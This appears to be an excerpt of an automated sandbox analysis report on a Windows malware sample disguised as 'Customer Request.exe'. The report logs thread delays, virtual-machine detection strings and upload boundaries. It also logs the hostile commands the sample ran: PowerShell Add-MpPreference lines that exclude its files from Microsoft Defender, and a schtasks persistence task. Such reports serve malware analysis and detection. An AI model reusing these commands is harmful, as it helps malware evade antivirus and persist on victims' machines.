Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239870
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239764
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239640
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239531
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239421
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239310
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239202
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 239079
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 238959
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599598
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599469
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599354
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599248
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599123
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 599003
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598652
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597343
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 597015
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 596896
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 596767
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595828
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595608
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594280
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594172
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 594062
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 593953
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 593826
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 593703
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 593585
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd58da3ab36bd1<
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd51c42e28e955
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd52621a53558f
Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8e2c10ef1daec42
Source: gCFuOglEso.exe, 0000000B.00000002.1524551945.0000000006ADC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A77000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5386acd74a6b
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd527858d8e06d
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd54016fcc0347
Source: gCFuOglEso.exe, 0000000B.00000002.1524551945.0000000006ADC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd588331d88799
Source: Customer Request.exe, 0000000A.00000002.2708190624.0000000001306000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllSy
Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8e3757e05def62f
Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8df398a9e398d9f
Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8e3b0c96e1dafb8<
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd58d44c277f5a@\
Source: gCFuOglEso.exe, 0000000F.00000002.2707096158.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5236b62b17e5<
Source: C:\Users\user\Desktop\Customer Request.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Customer Request.exe Code function: 10_2_0560C010 LdrInitializeThunk, 10_2_0560C010
Source: C:\Users\user\Desktop\Customer Request.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Customer Request.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Customer Request.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Memory written: C:\Users\user\Desktop\Customer Request.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Memory written: C:\Users\user\AppData\Roaming\gCFuOglEso.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\Desktop\Customer Request.exe Process created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp"
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Process created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
Source: Customer Request.exe, 0000000A.00000002.2710969497.000000000338E000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.00000000031A7000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: Customer Request.exe, 0000000A.00000002.2710969497.000000000338E000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2746132985.000000000722D000.00000004.00000010.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.00000000031A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`,
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Users\user\Desktop\Customer Request.exe VolumeInformation
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Customer Request.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Users\user\Desktop\Customer Request.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
